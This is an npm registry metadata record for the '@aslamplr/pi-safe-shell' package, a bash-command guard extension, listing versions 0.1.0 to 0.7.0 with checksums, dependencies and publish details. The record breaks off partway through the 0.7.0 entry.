{"_id":"@aslamplr/pi-safe-shell","_rev":"17-8be83d30a3cc0a6bba42be13f15c05da","name":"@aslamplr/pi-safe-shell","dist-tags":{"latest":"0.7.1"},"versions":{"0.1.0":{"name":"@aslamplr/pi-safe-shell","version":"0.1.0","keywords":["pi","pi-extension","bash","security","safety","guard"],"author":{"name":"aslamplr"},"license":"MIT","_id":"@aslamplr/pi-safe-shell@0.1.0","maintainers":[{"name":"aslamplr","email":"aslamplr@gmail.com"}],"homepage":"https://github.com/aslamplr/pi-safe-shell#readme","bugs":{"url":"https://github.com/aslamplr/pi-safe-shell/issues"},"pi":{"extensions":["./index.ts"]},"dist":{"shasum":"352ec953d88670e7ffd0cc289eb4e0238c0efa88","tarball":"https://registry.npmjs.org/@aslamplr/pi-safe-shell/-/pi-safe-shell-0.1.0.tgz","fileCount":3,"integrity":"sha512-L4AQOBJpL3IbCAsLjP++j5u73kDVx9/rjzFlKWedj2h1pqjwcNisf2oXvBbNI61Lcfn8ETEltX4JiQvy0y2gFg==","signatures":[{"sig":"MEQCIDDtet6JR35dutLjmViSFFgFlieN8OTzLkdHqIcm7hqxAiB2jZX6nP+o2lsJcbTuz7CqIlRfP20h2bn+GINQAe+sKA==","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"attestations":{"url":"https://registry.npmjs.org/-/npm/v1/attestations/@aslamplr%2fpi-safe-shell@0.1.0","provenance":{"predicateType":"https://slsa.dev/provenance/v1"}},"unpackedSize":54482},"main":"index.ts","type":"commonjs","gitHead":"99569285e888f91847388a3185754f3630691723","scripts":{"test":"vitest run"},"_npmUser":{"name":"aslamplr","email":"aslamplr@gmail.com"},"repository":{"url":"git+https://github.com/aslamplr/pi-safe-shell.git","type":"git"},"_npmVersion":"11.11.0","description":"Protect your production assets from dangerous bash commands. Default no-bash mode with user approval gates and whitelist support.","directories":{},"_nodeVersion":"24.14.1","_hasShrinkwrap":false,"devDependencies":{"vitest":"^4.1.6","typescript":"^5.8.3","@types/node":"^25.7.0"},"_npmOperationalInternal":{"tmp":"tmp/pi-safe-shell_0.1.0_1778685330734_0.1460927938728076","host":"s3://npm-registry-packages-npm-production"}},"0.2.0":{"name":"@aslamplr/pi-safe-shell","version":"0.2.0","keywords":["pi","pi-extension","bash","security","safety","guard"],"author":{"name":"aslamplr"},"license":"MIT","_id":"@aslamplr/pi-safe-shell@0.2.0","maintainers":[{"name":"aslamplr","email":"aslamplr@gmail.com"}],"homepage":"https://github.com/aslamplr/pi-safe-shell#readme","bugs":{"url":"https://github.com/aslamplr/pi-safe-shell/issues"},"pi":{"extensions":["./index.ts"]},"dist":{"shasum":"698c6a009eca02859c167501d197e02fe7a97668","tarball":"https://registry.npmjs.org/@aslamplr/pi-safe-shell/-/pi-safe-shell-0.2.0.tgz","fileCount":3,"integrity":"sha512-q9yXgy6tEZGLQpCL5XZbHAD+4JtSJmi3I556a/57BLYoZA2Px99KO0cP5ZENvwYGV29kXT7Qo+k4YTn1Om+gkQ==","signatures":[{"sig":"MEUCIQC3I3wRdYsTriOjJEEEw6U81f6FooT/MbCZlyn1APjipwIgIj/jOa6j5kIFEccuW4DJJj5SBgZ1KR6jKFIbp6cQzog=","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"attestations":{"url":"https://registry.npmjs.org/-/npm/v1/attestations/@aslamplr%2fpi-safe-shell@0.2.0","provenance":{"predicateType":"https://slsa.dev/provenance/v1"}},"unpackedSize":55117},"main":"index.ts","type":"commonjs","gitHead":"0fc8df771fe736d78479abb839688a9af91163f7","scripts":{"test":"vitest run"},"_npmUser":{"name":"aslamplr","email":"aslamplr@gmail.com"},"repository":{"url":"git+https://github.com/aslamplr/pi-safe-shell.git","type":"git"},"_npmVersion":"11.11.0","description":"Protect your production assets from dangerous bash commands. Default no-bash mode with user approval gates and whitelist support.","directories":{},"_nodeVersion":"24.14.1","_hasShrinkwrap":false,"devDependencies":{"vitest":"^4.1.6","typescript":"^5.8.3","@types/node":"^25.7.0"},"_npmOperationalInternal":{"tmp":"tmp/pi-safe-shell_0.2.0_1778694592763_0.3830918211575405","host":"s3://npm-registry-packages-npm-production"}},"0.3.0":{"name":"@aslamplr/pi-safe-shell","version":"0.3.0","keywords":["pi","pi-extension","bash","security","safety","guard"],"author":{"name":"aslamplr"},"license":"MIT","_id":"@aslamplr/pi-safe-shell@0.3.0","maintainers":[{"name":"aslamplr","email":"aslamplr@gmail.com"}],"homepage":"https://github.com/aslamplr/pi-safe-shell#readme","bugs":{"url":"https://github.com/aslamplr/pi-safe-shell/issues"},"pi":{"extensions":["./index.ts"]},"dist":{"shasum":"e7d7bd090cd6f6c42044be3dfb7557928905b3c7","tarball":"https://registry.npmjs.org/@aslamplr/pi-safe-shell/-/pi-safe-shell-0.3.0.tgz","fileCount":3,"integrity":"sha512-AgubVqwwdMULelNR44AeOwYg5ogLbyvWqwiS3Sn+UBywfyuPa8bwJ+Xk5hl5guBH/U1pzR3IOB6qgpv31+BsYg==","signatures":[{"sig":"MEYCIQCwyKctNZrV2Ns8mb3PGEYYisf8oxZ1g/jmH5m0/FMF1AIhAPWBuj5RHOFQdLVXxRjQ3BHeqnqLlRpsc5JH5rLNcB9H","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"attestations":{"url":"https://registry.npmjs.org/-/npm/v1/attestations/@aslamplr%2fpi-safe-shell@0.3.0","provenance":{"predicateType":"https://slsa.dev/provenance/v1"}},"unpackedSize":60933},"main":"index.ts","type":"commonjs","gitHead":"951574c8b3b1240a34bb8ea8736047f7164fc79f","scripts":{"test":"vitest run"},"_npmUser":{"name":"aslamplr","email":"aslamplr@gmail.com"},"deprecated":"Critical packaging issue: missing src/ directory. Use v0.3.1 instead.","repository":{"url":"git+https://github.com/aslamplr/pi-safe-shell.git","type":"git"},"_npmVersion":"11.11.0","description":"Protect your production assets from dangerous bash commands. Default no-bash mode with user approval gates and whitelist support.","directories":{},"_nodeVersion":"24.14.1","_hasShrinkwrap":false,"devDependencies":{"vitest":"^4.1.6","typescript":"^5.8.3","@types/node":"^25.7.0","web-tree-sitter":"^0.26.8","tree-sitter-bash":"^0.25.1"},"_npmOperationalInternal":{"tmp":"tmp/pi-safe-shell_0.3.0_1778758635772_0.657314921054809","host":"s3://npm-registry-packages-npm-production"}},"0.3.1":{"name":"@aslamplr/pi-safe-shell","version":"0.3.1","keywords":["pi","pi-extension","bash","security","safety","guard"],"author":{"name":"aslamplr"},"license":"MIT","_id":"@aslamplr/pi-safe-shell@0.3.1","maintainers":[{"name":"aslamplr","email":"aslamplr@gmail.com"}],"homepage":"https://github.com/aslamplr/pi-safe-shell#readme","bugs":{"url":"https://github.com/aslamplr/pi-safe-shell/issues"},"pi":{"extensions":["./index.ts"]},"dist":{"shasum":"89ece26dc1d78409289572702fbbb9c45b9355d1","tarball":"https://registry.npmjs.org/@aslamplr/pi-safe-shell/-/pi-safe-shell-0.3.1.tgz","fileCount":5,"integrity":"sha512-h3zjEw81GlsWsECw3OwiUcAIcFYZC8ZDcJH+zjeYzjjHpTbcSesf5dATOFn11ShOOq+112oEjzKRYG4EIKkWvg==","signatures":[{"sig":"MEYCIQC9OOzPk34ZTWw4DwwxQdCz5EDuGccrZ/LpOC+cUroCJgIhALx53pk3pEwMAuzp4eXdcLqNS7UyuAsMBeUVOSTByiaG","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"attestations":{"url":"https://registry.npmjs.org/-/npm/v1/attestations/@aslamplr%2fpi-safe-shell@0.3.1","provenance":{"predicateType":"https://slsa.dev/provenance/v1"}},"unpackedSize":1442850},"main":"index.ts","type":"commonjs","gitHead":"ea4e855e5d9a8197c09eb09927e16d34f6924066","scripts":{"test":"vitest run"},"_npmUser":{"name":"aslamplr","email":"aslamplr@gmail.com"},"repository":{"url":"git+https://github.com/aslamplr/pi-safe-shell.git","type":"git"},"_npmVersion":"11.11.0","description":"Protect your production assets from dangerous bash commands. Default no-bash mode with user approval gates and whitelist support.","directories":{},"_nodeVersion":"24.14.1","dependencies":{"web-tree-sitter":"^0.26.8","tree-sitter-bash":"^0.25.1"},"_hasShrinkwrap":false,"devDependencies":{"vitest":"^4.1.6","typescript":"^5.8.3","@types/node":"^25.7.0"},"_npmOperationalInternal":{"tmp":"tmp/pi-safe-shell_0.3.1_1778763465259_0.5633359906598121","host":"s3://npm-registry-packages-npm-production"}},"0.4.0":{"name":"@aslamplr/pi-safe-shell","version":"0.4.0","keywords":["pi","pi-extension","bash","security","safety","guard"],"author":{"name":"aslamplr"},"license":"MIT","_id":"@aslamplr/pi-safe-shell@0.4.0","maintainers":[{"name":"aslamplr","email":"aslamplr@gmail.com"}],"homepage":"https://github.com/aslamplr/pi-safe-shell#readme","bugs":{"url":"https://github.com/aslamplr/pi-safe-shell/issues"},"pi":{"extensions":["./index.ts"]},"dist":{"shasum":"b4abf9674541c62f6d96984f57b66ab4b13b40dd","tarball":"https://registry.npmjs.org/@aslamplr/pi-safe-shell/-/pi-safe-shell-0.4.0.tgz","fileCount":6,"integrity":"sha512-hvGV0KgcnG5PJpjXVkI7xbJfFvokGz0TILbof5ooe3jTW9OaCnUIf7XGefK2cb4O+ZAA0EH8a5/FcXLmzC+sfw==","signatures":[{"sig":"MEYCIQDXO+j926MIDCl/2evOhgTohVKxNJxx2XgtYcV2a8KzewIhAMC3IP0l3owSaHwM81L2zHeGpMFkN4xgK027jOHM/SWx","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"attestations":{"url":"https://registry.npmjs.org/-/npm/v1/attestations/@aslamplr%2fpi-safe-shell@0.4.0","provenance":{"predicateType":"https://slsa.dev/provenance/v1"}},"unpackedSize":1501680},"main":"index.ts","type":"commonjs","gitHead":"da90151bd609e004dcb962af741fbc2c63253287","scripts":{"test":"vitest run"},"_npmUser":{"name":"aslamplr","email":"aslamplr@gmail.com"},"repository":{"url":"git+https://github.com/aslamplr/pi-safe-shell.git","type":"git"},"_npmVersion":"11.12.1","description":"Protect your production assets from dangerous bash commands. Default no-bash mode with user approval gates and whitelist support.","directories":{},"_nodeVersion":"24.15.0","dependencies":{"web-tree-sitter":"^0.26.8","tree-sitter-bash":"^0.25.1"},"_hasShrinkwrap":false,"devDependencies":{"vitest":"^4.1.6","typescript":"^5.8.3","@types/node":"^25.7.0"},"_npmOperationalInternal":{"tmp":"tmp/pi-safe-shell_0.4.0_1778842620527_0.2875006318574209","host":"s3://npm-registry-packages-npm-production"}},"0.4.1":{"name":"@aslamplr/pi-safe-shell","version":"0.4.1","keywords":["pi","pi-extension","bash","security","safety","guard"],"author":{"name":"aslamplr"},"license":"MIT","_id":"@aslamplr/pi-safe-shell@0.4.1","maintainers":[{"name":"aslamplr","email":"aslamplr@gmail.com"}],"homepage":"https://github.com/aslamplr/pi-safe-shell#readme","bugs":{"url":"https://github.com/aslamplr/pi-safe-shell/issues"},"pi":{"extensions":["./index.ts"]},"dist":{"shasum":"be0c23171bafa06f59d8794f218a6f5c45e4a213","tarball":"https://registry.npmjs.org/@aslamplr/pi-safe-shell/-/pi-safe-shell-0.4.1.tgz","fileCount":6,"integrity":"sha512-fs38cqwDFkYg7aA9GaqiYgQR9VGxH8Ut0OsaTPaNolXbkuhtjxRKjC8klRv763ad6jph7RWcBVGeJc773fFVFg==","signatures":[{"sig":"MEQCIFAc4jigSk1UXRvUshni/mQ1/RBmp+edZ8ZynLchyR/wAiBqj3cNxWy/5F26SgXgMiRc5qUX8CPvCI0CoCbTCRxWFg==","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"attestations":{"url":"https://registry.npmjs.org/-/npm/v1/attestations/@aslamplr%2fpi-safe-shell@0.4.1","provenance":{"predicateType":"https://slsa.dev/provenance/v1"}},"unpackedSize":1497336},"main":"index.ts","type":"commonjs","gitHead":"31a4a554628a3f04cdc047891a9722ef9c03ce0c","scripts":{"test":"vitest run"},"_npmUser":{"name":"aslamplr","email":"aslamplr@gmail.com"},"deprecated":"Github fork issue, please use v0.4.2 instead","repository":{"url":"git+https://github.com/aslamplr/pi-safe-shell.git","type":"git"},"_npmVersion":"11.12.1","description":"Protect your production assets from dangerous bash commands. Default no-bash mode with user approval gates and whitelist support.","directories":{},"_nodeVersion":"24.15.0","dependencies":{"web-tree-sitter":"^0.26.8","tree-sitter-bash":"^0.25.1"},"_hasShrinkwrap":false,"devDependencies":{"vitest":"^4.1.6","typescript":"^5.8.3","@types/node":"^25.7.0"},"_npmOperationalInternal":{"tmp":"tmp/pi-safe-shell_0.4.1_1778844057147_0.5571102061819548","host":"s3://npm-registry-packages-npm-production"}},"0.4.2":{"name":"@aslamplr/pi-safe-shell","version":"0.4.2","keywords":["pi","pi-extension","bash","security","safety","guard"],"author":{"name":"aslamplr"},"license":"MIT","_id":"@aslamplr/pi-safe-shell@0.4.2","maintainers":[{"name":"aslamplr","email":"aslamplr@gmail.com"}],"homepage":"https://github.com/aslamplr/pi-safe-shell#readme","bugs":{"url":"https://github.com/aslamplr/pi-safe-shell/issues"},"pi":{"extensions":["./index.ts"]},"dist":{"shasum":"1ce35752c1beaac0f6edf308bc63fdc77177bf1c","tarball":"https://registry.npmjs.org/@aslamplr/pi-safe-shell/-/pi-safe-shell-0.4.2.tgz","fileCount":6,"integrity":"sha512-iXONzi5mO8MCWCIm48mTr4T6B8Iw1h2OejLqWkjX0PaRgjubudlBb04NwBYcPIVZPaYB6UjCJlHTqJKJPO2D5A==","signatures":[{"sig":"MEUCIQCDHLp0S5FmZGNwrNB7vPljss9gyQTLomStOCXMoiUJqgIgFG++dh9EGQBC10f+e0uYJUbtKw+kwkNHbjQCFikdcSk=","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"attestations":{"url":"https://registry.npmjs.org/-/npm/v1/attestations/@aslamplr%2fpi-safe-shell@0.4.2","provenance":{"predicateType":"https://slsa.dev/provenance/v1"}},"unpackedSize":1497336},"main":"index.ts","type":"commonjs","gitHead":"e77b4ef5af1850f1dd11b863cf3ae00ae2a8377e","scripts":{"test":"vitest run"},"_npmUser":{"name":"aslamplr","email":"aslamplr@gmail.com"},"repository":{"url":"git+https://github.com/aslamplr/pi-safe-shell.git","type":"git"},"_npmVersion":"11.11.0","description":"Protect your production assets from dangerous bash commands. Default no-bash mode with user approval gates and whitelist support.","directories":{},"_nodeVersion":"24.14.1","dependencies":{"web-tree-sitter":"^0.26.8","tree-sitter-bash":"^0.25.1"},"_hasShrinkwrap":false,"devDependencies":{"vitest":"^4.1.6","typescript":"^5.8.3","@types/node":"^25.7.0"},"_npmOperationalInternal":{"tmp":"tmp/pi-safe-shell_0.4.2_1778846155602_0.7034821566648781","host":"s3://npm-registry-packages-npm-production"}},"0.5.0":{"name":"@aslamplr/pi-safe-shell","version":"0.5.0","keywords":["pi","pi-extension","bash","security","safety","guard"],"author":{"name":"aslamplr"},"license":"MIT","_id":"@aslamplr/pi-safe-shell@0.5.0","maintainers":[{"name":"aslamplr","email":"aslamplr@gmail.com"}],"homepage":"https://github.com/aslamplr/pi-safe-shell#readme","bugs":{"url":"https://github.com/aslamplr/pi-safe-shell/issues"},"pi":{"extensions":["./index.ts"]},"dist":{"shasum":"9a2af5637bf69f4ee463a611258efb76da78d967","tarball":"https://registry.npmjs.org/@aslamplr/pi-safe-shell/-/pi-safe-shell-0.5.0.tgz","fileCount":6,"integrity":"sha512-pDoocI4dA9rxkLPEiZFuCEB8MLmahm+gbjVQGGVMwRMggvfAVHXepHB/VVagybyhutcsmzJgWjDgwe/nud2EAA==","signatures":[{"sig":"MEYCIQCTFkr3owR6ZqDxj2LQbf9wjZbhuNHlyyqmrtIp4P19AwIhAPKpSXaFKJJYz74I3Yisr/Yff2WxO6waP2OHVR9vEvz4","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"attestations":{"url":"https://registry.npmjs.org/-/npm/v1/attestations/@aslamplr%2fpi-safe-shell@0.5.0","provenance":{"predicateType":"https://slsa.dev/provenance/v1"}},"unpackedSize":1499828},"main":"index.ts","type":"commonjs","gitHead":"b1b3163215b31602130a6978a687010382a50be1","scripts":{"test":"vitest run"},"_npmUser":{"name":"aslamplr","email":"aslamplr@gmail.com"},"repository":{"url":"git+https://github.com/aslamplr/pi-safe-shell.git","type":"git"},"_npmVersion":"11.12.1","description":"Protect your production assets from dangerous bash commands. Default no-bash mode with user approval gates and whitelist support.","directories":{},"_nodeVersion":"24.15.0","dependencies":{"web-tree-sitter":"^0.26.8","tree-sitter-bash":"^0.25.1"},"_hasShrinkwrap":false,"devDependencies":{"vitest":"^4.1.6","typescript":"^5.8.3","@types/node":"^25.7.0"},"_npmOperationalInternal":{"tmp":"tmp/pi-safe-shell_0.5.0_1779210415026_0.5283391124658232","host":"s3://npm-registry-packages-npm-production"}},"0.5.1":{"name":"@aslamplr/pi-safe-shell","version":"0.5.1","keywords":["pi","pi-extension","bash","security","safety","guard"],"author":{"name":"aslamplr"},"license":"MIT","_id":"@aslamplr/pi-safe-shell@0.5.1","maintainers":[{"name":"aslamplr","email":"aslamplr@gmail.com"}],"homepage":"https://github.com/aslamplr/pi-safe-shell#readme","bugs":{"url":"https://github.com/aslamplr/pi-safe-shell/issues"},"pi":{"extensions":["./index.ts"]},"dist":{"shasum":"80413652b754ffb55715bbc93e3ecb7b84c5f4fe","tarball":"https://registry.npmjs.org/@aslamplr/pi-safe-shell/-/pi-safe-shell-0.5.1.tgz","fileCount":6,"integrity":"sha512-JMhTxJ9Zed6mLFLPRyBtuQn0Vc3h5qtHIiy6IL0U2x7WDh+rnv/yWkDi+dUxgLq3olEZv2/r9OXJRAqZ9PvO/g==","signatures":[{"sig":"MEUCICvMZVmsb1TKaYRn3TztVtdVaMXh7NEqu2Tnmh1/KfnFAiEA40lBp3HO76N5JN1ryyWq9rVOiQPFbXqMkbHXmKgOpHE=","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"attestations":{"url":"https://registry.npmjs.org/-/npm/v1/attestations/@aslamplr%2fpi-safe-shell@0.5.1","provenance":{"predicateType":"https://slsa.dev/provenance/v1"}},"unpackedSize":1499844},"main":"index.ts","type":"commonjs","gitHead":"909610e96672da197f33655ae99303c65d1527d2","scripts":{"test":"vitest run"},"_npmUser":{"name":"aslamplr","email":"aslamplr@gmail.com"},"repository":{"url":"git+https://github.com/aslamplr/pi-safe-shell.git","type":"git"},"_npmVersion":"11.12.1","description":"Protect your production assets from dangerous bash commands. Default no-bash mode with user approval gates and whitelist support.","directories":{},"_nodeVersion":"24.15.0","dependencies":{"web-tree-sitter":"^0.26.8","tree-sitter-bash":"^0.25.1"},"_hasShrinkwrap":false,"devDependencies":{"vitest":"^4.1.6","typescript":"^5.8.3","@types/node":"^25.7.0"},"_npmOperationalInternal":{"tmp":"tmp/pi-safe-shell_0.5.1_1779217790451_0.2825687577360423","host":"s3://npm-registry-packages-npm-production"}},"0.5.2":{"name":"@aslamplr/pi-safe-shell","version":"0.5.2","keywords":["pi-package","pi","pi-extension","bash","security","safety","guard"],"author":{"name":"aslamplr"},"license":"MIT","_id":"@aslamplr/pi-safe-shell@0.5.2","maintainers":[{"name":"aslamplr","email":"aslamplr@gmail.com"}],"homepage":"https://github.com/aslamplr/pi-safe-shell#readme","bugs":{"url":"https://github.com/aslamplr/pi-safe-shell/issues"},"pi":{"extensions":["./index.ts"]},"dist":{"shasum":"bc73b20309042d1b09c39e6d52be16148620c266","tarball":"https://registry.npmjs.org/@aslamplr/pi-safe-shell/-/pi-safe-shell-0.5.2.tgz","fileCount":6,"integrity":"sha512-B/majvJ5zPlcAkJ0z4NV3XWv9rjFkXEDmSAYluQ4RN+0vuZClJuotwOlLn3UyNjeYTwF6QCuFpZSE8CMw2llyA==","signatures":[{"sig":"MEUCIQC6V+z2JK+vB3zcyTb6RzP56PiMA+biZq520xBiXhPv5gIgDEFbc7KgostR+CtESAOEFIK+KZXy9bkrFVbHFFqHDbg=","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"attestations":{"url":"https://registry.npmjs.org/-/npm/v1/attestations/@aslamplr%2fpi-safe-shell@0.5.2","provenance":{"predicateType":"https://slsa.dev/provenance/v1"}},"unpackedSize":1499862},"main":"index.ts","type":"commonjs","gitHead":"e4c060846567f1f651078a3f816355457a5a9264","scripts":{"test":"vitest run"},"_npmUser":{"name":"aslamplr","email":"aslamplr@gmail.com"},"repository":{"url":"git+https://github.com/aslamplr/pi-safe-shell.git","type":"git"},"_npmVersion":"11.12.1","description":"Protect your production assets from dangerous bash commands. Default no-bash mode with user approval gates and whitelist support.","directories":{},"_nodeVersion":"24.15.0","dependencies":{"web-tree-sitter":"^0.26.8","tree-sitter-bash":"^0.25.1"},"_hasShrinkwrap":false,"devDependencies":{"vitest":"^4.1.6","typescript":"^5.8.3","@types/node":"^25.7.0"},"_npmOperationalInternal":{"tmp":"tmp/pi-safe-shell_0.5.2_1779248946696_0.43017280646276435","host":"s3://npm-registry-packages-npm-production"}},"0.6.1":{"name":"@aslamplr/pi-safe-shell","version":"0.6.1","keywords":["pi-package","pi","pi-extension","bash","security","safety","guard"],"author":{"name":"aslamplr"},"license":"MIT","_id":"@aslamplr/pi-safe-shell@0.6.1","maintainers":[{"name":"aslamplr","email":"aslamplr@gmail.com"}],"homepage":"https://github.com/aslamplr/pi-safe-shell#readme","bugs":{"url":"https://github.com/aslamplr/pi-safe-shell/issues"},"pi":{"extensions":["./index.ts"]},"dist":{"shasum":"5a10dd16206ed3ed167e1f583914ed007795ab7e","tarball":"https://registry.npmjs.org/@aslamplr/pi-safe-shell/-/pi-safe-shell-0.6.1.tgz","fileCount":8,"integrity":"sha512-sV4sOB3bIyOm4oOLmJG+YhrQrcf8HbPA44EbCaCCnOWDkZE8HUw4DDE80U82+WoHNBXJv1Kk+XeXhVUo3iGKJA==","signatures":[{"sig":"MEUCIHxl2gy0yQg7fQQ7ftdHoE91vbMSc0c448OrzPOd7RBdAiEAiNfRzIiMlZF0phLjdqTgDdIIB5Qoxd+6NWG16XnPYxk=","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"attestations":{"url":"https://registry.npmjs.org/-/npm/v1/attestations/@aslamplr%2fpi-safe-shell@0.6.1","provenance":{"predicateType":"https://slsa.dev/provenance/v1"}},"unpackedSize":1555711},"main":"index.ts","type":"commonjs","gitHead":"1778bfbec9c5709d9094879af372e4e1b48e4cd5","scripts":{"test":"vitest run"},"_npmUser":{"name":"aslamplr","email":"aslamplr@gmail.com"},"repository":{"url":"git+https://github.com/aslamplr/pi-safe-shell.git","type":"git"},"_npmVersion":"11.12.1","description":"Protect your production assets from dangerous bash commands. Default no-bash mode with user approval gates and whitelist support.","directories":{},"_nodeVersion":"24.15.0","dependencies":{"web-tree-sitter":"^0.26.8","tree-sitter-bash":"^0.25.1"},"_hasShrinkwrap":false,"devDependencies":{"vitest":"^4.1.6","typescript":"^5.8.3","@types/node":"^25.7.0"},"_npmOperationalInternal":{"tmp":"tmp/pi-safe-shell_0.6.1_1779903926697_0.03447412457076515","host":"s3://npm-registry-packages-npm-production"}},"0.6.3":{"name":"@aslamplr/pi-safe-shell","version":"0.6.3","keywords":["pi-package","pi","pi-extension","bash","security","safety","guard"],"author":{"name":"aslamplr"},"license":"MIT","_id":"@aslamplr/pi-safe-shell@0.6.3","maintainers":[{"name":"aslamplr","email":"aslamplr@gmail.com"}],"homepage":"https://github.com/aslamplr/pi-safe-shell#readme","bugs":{"url":"https://github.com/aslamplr/pi-safe-shell/issues"},"pi":{"extensions":["./index.ts"]},"dist":{"shasum":"2b354f7fd65ca4e744214679a7464ae4c36ebecb","tarball":"https://registry.npmjs.org/@aslamplr/pi-safe-shell/-/pi-safe-shell-0.6.3.tgz","fileCount":8,"integrity":"sha512-ifgb8qi9vJ2f3xqkyLo0PQ5TNtviLMHjImEhJtTaX0Juk7pxEW3HdIlmEErE5Y0+amBycsdv3MIRPG0vL5dRJg==","signatures":[{"sig":"MEUCIQCmR/laOpO89A8IMQ7juXqIcJvnjUljyvTLU704NYwpEwIgdbZqqfHpT5ABFySxVGi/XTnEIH1vksFP8qwFgd3G+xs=","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"attestations":{"url":"https://registry.npmjs.org/-/npm/v1/attestations/@aslamplr%2fpi-safe-shell@0.6.3","provenance":{"predicateType":"https://slsa.dev/provenance/v1"}},"unpackedSize":1555741},"main":"index.ts","type":"commonjs","gitHead":"d2bdf12a648f355eb78c0c4c25e99c150b29daaa","scripts":{"test":"vitest run"},"_npmUser":{"name":"GitHub Actions","email":"npm-oidc-no-reply@github.com","trustedPublisher":{"id":"github","oidcConfigId":"oidc:d9fb1e48-dd9d-4901-ad36-278d5742db62"}},"repository":{"url":"git+https://github.com/aslamplr/pi-safe-shell.git","type":"git"},"_npmVersion":"11.13.0","description":"Protect your production assets from dangerous bash commands. Default no-bash mode with user approval gates and whitelist support.","directories":{},"_nodeVersion":"24.16.0","dependencies":{"web-tree-sitter":"^0.26.8","tree-sitter-bash":"^0.25.1"},"_hasShrinkwrap":false,"devDependencies":{"vitest":"^4.1.6","typescript":"^5.8.3","@types/node":"^25.7.0"},"_npmOperationalInternal":{"tmp":"tmp/pi-safe-shell_0.6.3_1780923138397_0.19867911882361455","host":"s3://npm-registry-packages-npm-production"}},"0.6.4":{"name":"@aslamplr/pi-safe-shell","version":"0.6.4","keywords":["pi-package","pi","pi-extension","bash","security","safety","guard"],"author":{"name":"aslamplr"},"license":"MIT","_id":"@aslamplr/pi-safe-shell@0.6.4","maintainers":[{"name":"aslamplr","email":"aslamplr@gmail.com"}],"homepage":"https://github.com/aslamplr/pi-safe-shell#readme","bugs":{"url":"https://github.com/aslamplr/pi-safe-shell/issues"},"pi":{"extensions":["./index.ts"]},"dist":{"shasum":"d1504d5c3304145940dd5eab55080910d2396a78","tarball":"https://registry.npmjs.org/@aslamplr/pi-safe-shell/-/pi-safe-shell-0.6.4.tgz","fileCount":8,"integrity":"sha512-rFGTLpAcSJEAUj1qrCOrf7cTGKv8pDksoDDVdxfpIKEUlwpI388oW2Euhn2fiUE918MIRLT94U6HOSybCrq5Uw==","signatures":[{"sig":"MEYCIQCQ9r2dfyXV4iQOk9MZ4Uk5fk+cu75+ZEE7dlqOc8ik6AIhANCtkvpXB5DXb7C8UaEyZ8d5Z2imWNeeDheoYSw2Hu9n","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"attestations":{"url":"https://registry.npmjs.org/-/npm/v1/attestations/@aslamplr%2fpi-safe-shell@0.6.4","provenance":{"predicateType":"https://slsa.dev/provenance/v1"}},"unpackedSize":1555789},"main":"index.ts","type":"commonjs","gitHead":"e6a0c3de10377467f4fdf9b580e6b160478be8b2","scripts":{"test":"vitest run"},"_npmUser":{"name":"GitHub Actions","email":"npm-oidc-no-reply@github.com","trustedPublisher":{"id":"github","oidcConfigId":"oidc:d9fb1e48-dd9d-4901-ad36-278d5742db62"}},"repository":{"url":"git+https://github.com/aslamplr/pi-safe-shell.git","type":"git"},"_npmVersion":"11.13.0","description":"Protect your production assets from dangerous bash commands. Default no-bash mode with user approval gates and whitelist support.","directories":{},"_nodeVersion":"24.16.0","dependencies":{"web-tree-sitter":"^0.26.8","tree-sitter-bash":"^0.25.1"},"_hasShrinkwrap":false,"devDependencies":{"vitest":"^4.1.6","typescript":"^5.8.3","@types/node":"^25.7.0"},"_npmOperationalInternal":{"tmp":"tmp/pi-safe-shell_0.6.4_1781172644538_0.7989185532024141","host":"s3://npm-registry-packages-npm-production"}},"0.7.0":{"name":"@aslamplr/pi-safe-shell","version":"0.7.0","keywords":["pi-package","pi","pi-extension","bash","security","safety","guard"],"author":{"name":"aslamplr"},"license":"MIT","_id":"@aslamplr/pi-safe-shell@0.7.0","maintainers":[{"name":"aslamplr","email":"aslamplr@gmail.com"}],"homepage":"https://github.com/aslamplr/pi-safe-shell#readme","bugs":{"url":"https://github.com/aslamplr/pi-safe-shell/issues"},"pi":{"extensions":["./index.ts"]},"dist":{"shasum":"f1efe01fe78d7a4e1155bac5aa13beb5e04fdd37","tarball":"https://registry.npmjs.org/@aslamplr/pi-safe-shell/-/pi-safe-shell-0.7.0.tgz","fileCount":9,"integrity":"sha512-6KFjK2+WmvP9iZU6CI1L5KJqUw+RWDKT4jRGzJh7u4NV+/MM3aS/eozaHLiGH6mDy38TLfNyZUTGZuY0xy/SOA==","signatures":[{"sig":"MEYCIQDinOit4K2n0WnkvlUUopnTIEVZTwOaoQqFxsfjzKKn9AIhAIkqrQx2LjgBO2yTpZtLElK2cpk2tVnVOyNfMCYxUpfM","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"attestations":{"url":"https://registry.npmjs.org/-/npm/v1/attestations/@aslamplr%2fpi-safe-shell@0.7.0","provenance":{"predicateType":"https://slsa.dev/provenance/v1"}},"unpackedSize":1580173},"main":"index.ts","type":"commonjs","gitHead":"db72d74a79062c0d3b46cdaec55f88b8b216cd4e","scripts":{"test":"vitest run","metrics":"tsx scripts/metrics.ts","pretest":"npm run 